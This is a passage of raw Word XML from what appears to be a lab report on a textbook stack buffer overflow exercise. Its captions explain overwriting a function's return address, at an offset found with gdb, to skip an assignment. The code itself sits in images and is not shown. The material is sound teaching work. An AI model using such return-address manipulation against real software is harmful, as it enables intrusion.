    <w:p w14:paraId="53E9B35D" w14:textId="4792DDA9" w:rsidR="00D97D36" w:rsidRDefault="00D97D36" w:rsidP="00D97D36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="684E854B" w14:textId="64A054EF" w:rsidR="00D97D36" w:rsidRDefault="00D97D36" w:rsidP="00D97D36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13BE12DA" wp14:editId="410E820F">
            <wp:extent cx="5943600" cy="23387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338705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E74CB5" w14:textId="378A340F" w:rsidR="00D97D36" w:rsidRDefault="00D97D36" w:rsidP="00D97D36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFBF053" w14:textId="57DD629D" w:rsidR="00D97D36" w:rsidRDefault="00D97D36" w:rsidP="00D97D36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="631D0330" w14:textId="6B1046B0" w:rsidR="00AF59B6" w:rsidRDefault="00AF59B6" w:rsidP="00D97D36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A74D09C" w14:textId="1E73E87C" w:rsidR="00AF59B6" w:rsidRDefault="00AF59B6" w:rsidP="00D97D36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FAAA188" w14:textId="3003B8FF" w:rsidR="00AF59B6" w:rsidRDefault="00AF59B6" w:rsidP="00D97D36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19DCD945" w14:textId="4887DC3F" w:rsidR="00AF59B6" w:rsidRDefault="00AF59B6" w:rsidP="00D97D36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F192EDC" w14:textId="77777777" w:rsidR="00AF59B6" w:rsidRDefault="00AF59B6" w:rsidP="00D97D36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AA59E22" w14:textId="41680362" w:rsidR="00D97D36" w:rsidRDefault="00791A56" w:rsidP="00D97D36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 2 shows the compilation of the above code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E56A35D" w14:textId="6CC5FBAD" w:rsidR="00791A56" w:rsidRDefault="00791A56" w:rsidP="00791A56">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02551456" w14:textId="17026854" w:rsidR="00791A56" w:rsidRDefault="00A51019" w:rsidP="00791A56">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="791D8939" wp14:editId="720DD071">
            <wp:extent cx="5943600" cy="8039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803910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="526919EF" w14:textId="1B1DBAE4" w:rsidR="00A51019" w:rsidRPr="00A51019" w:rsidRDefault="00A51019" w:rsidP="00A51019">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28460BB7" w14:textId="223C3B0E" w:rsidR="00A51019" w:rsidRDefault="00A51019" w:rsidP="00791A56">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB25E2D" w14:textId="04D3D93D" w:rsidR="00A51019" w:rsidRDefault="00A51019" w:rsidP="00791A56">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E41BA6C" w14:textId="119B6992" w:rsidR="00A51019" w:rsidRDefault="00A51019" w:rsidP="00A51019">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 3 shows the file that got created with the same name as the C file after the compilation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122DBE2A" w14:textId="77777777" w:rsidR="00A51019" w:rsidRDefault="00A51019" w:rsidP="00A51019">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="405C05B4" w14:textId="5E976FA1" w:rsidR="00A51019" w:rsidRDefault="00A51019" w:rsidP="00A51019">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69639EA1" wp14:editId="26010EA4">
            <wp:extent cx="5943600" cy="1570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570990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A2532B" w14:textId="77DC43C5" w:rsidR="00A51019" w:rsidRDefault="00A51019" w:rsidP="00A51019">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5820DCC4" w14:textId="7FC2434F" w:rsidR="00A51019" w:rsidRDefault="00A51019" w:rsidP="00A51019">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A9D346B" w14:textId="2822981B" w:rsidR="00A51019" w:rsidRDefault="00B945E8" w:rsidP="00A51019">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 4 shows the runn</w:t>
      </w:r>
      <w:r w:rsidR="005061E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ing of the code which prints ‘1’ as the output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523218ED" w14:textId="66F3231F" w:rsidR="005061E0" w:rsidRDefault="005061E0" w:rsidP="005061E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1897531A" w14:textId="42A1932D" w:rsidR="005061E0" w:rsidRDefault="005061E0" w:rsidP="005061E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FF1921C" wp14:editId="0A8F9DB3">
            <wp:extent cx="5943600" cy="13436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343660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B97F333" w14:textId="788AA30B" w:rsidR="005061E0" w:rsidRDefault="005061E0" w:rsidP="005061E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799DE48A" w14:textId="3955729A" w:rsidR="005061E0" w:rsidRDefault="005061E0" w:rsidP="005061E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E1A4A26" w14:textId="635119A2" w:rsidR="005061E0" w:rsidRDefault="005061E0" w:rsidP="005061E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5 </w:t>
      </w:r>
      <w:r w:rsidR="001C0370">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and Figure 6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shows the attack code where we try to modify the return address of the function by increasing its value by 8 bytes. By doing so, we can bypass the assignment statement immediately following it and proceed directly to the printf statement located at the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78964094" w14:textId="373854A5" w:rsidR="001C0370" w:rsidRDefault="001C0370" w:rsidP="001C0370">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0714008E" w14:textId="33B22BB2" w:rsidR="001C0370" w:rsidRDefault="001C0370" w:rsidP="001C0370">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="328C4A7E" wp14:editId="259A8377">
            <wp:extent cx="5943600" cy="3063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63240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55431FBC" w14:textId="689C6ACB" w:rsidR="001C0370" w:rsidRDefault="001C0370" w:rsidP="001C0370">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B9E016" w14:textId="1CD68CE0" w:rsidR="001C0370" w:rsidRDefault="001C0370" w:rsidP="001C0370">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE741E4" w14:textId="7D8F591C" w:rsidR="001C0370" w:rsidRDefault="001C0370" w:rsidP="001C0370">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29D74272" wp14:editId="07525B90">
            <wp:extent cx="5943600" cy="3051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51175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5A710B" w14:textId="718071F3" w:rsidR="001C0370" w:rsidRDefault="001C0370" w:rsidP="001C0370">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A072D5" w14:textId="11624374" w:rsidR="009F1421" w:rsidRDefault="009F1421" w:rsidP="001C0370">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01C2661A" w14:textId="552092E5" w:rsidR="009F1421" w:rsidRDefault="00C34385" w:rsidP="00C34385">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>On the stack, before the buffer1[] array, there is the Saved Frame Pointer (SFP), and before that, the return address. The return address is located 4 bytes beyond the end of buffer1[]. However, it is essential to note that buffer1[] is actually 2 words in length, equivalent to 8 bytes. As a result, the address calculated is 12 bytes from the start of buffer1[]. Consequently, in the given statement, the value of buffer1 is incremented by 12.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB04B48" w14:textId="4F44FF2B" w:rsidR="00C20F73" w:rsidRDefault="00C20F73" w:rsidP="00C34385">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24FDF1AF" w14:textId="1B4D2C06" w:rsidR="00C20F73" w:rsidRDefault="00C20F73" w:rsidP="00C34385">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">To determine the specific value of 8 bytes that need to be added in this scenario, we utilized a debugger tool such as “gdb”. By employing gdb, we examined the program’s execution and stack layout to identify the correct number of bytes required for our intended manipulation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Through this process of debugging and analysis, we verified and established the value of 8 bytes as the necessary adjustment in this particular case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9E99FF" w14:textId="3186D834" w:rsidR="004F5949" w:rsidRDefault="004F5949" w:rsidP="00C34385">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D211371" w14:textId="7DFD6CC6" w:rsidR="004F5949" w:rsidRDefault="004F5949" w:rsidP="004F5949">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 7 shows the buffer overflow attack code compilation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E42DCBD" w14:textId="661B45C1" w:rsidR="004F5949" w:rsidRDefault="004F5949" w:rsidP="004F5949">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4FEA22" w14:textId="246D1A70" w:rsidR="004F5949" w:rsidRDefault="004F5949" w:rsidP="004F5949">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
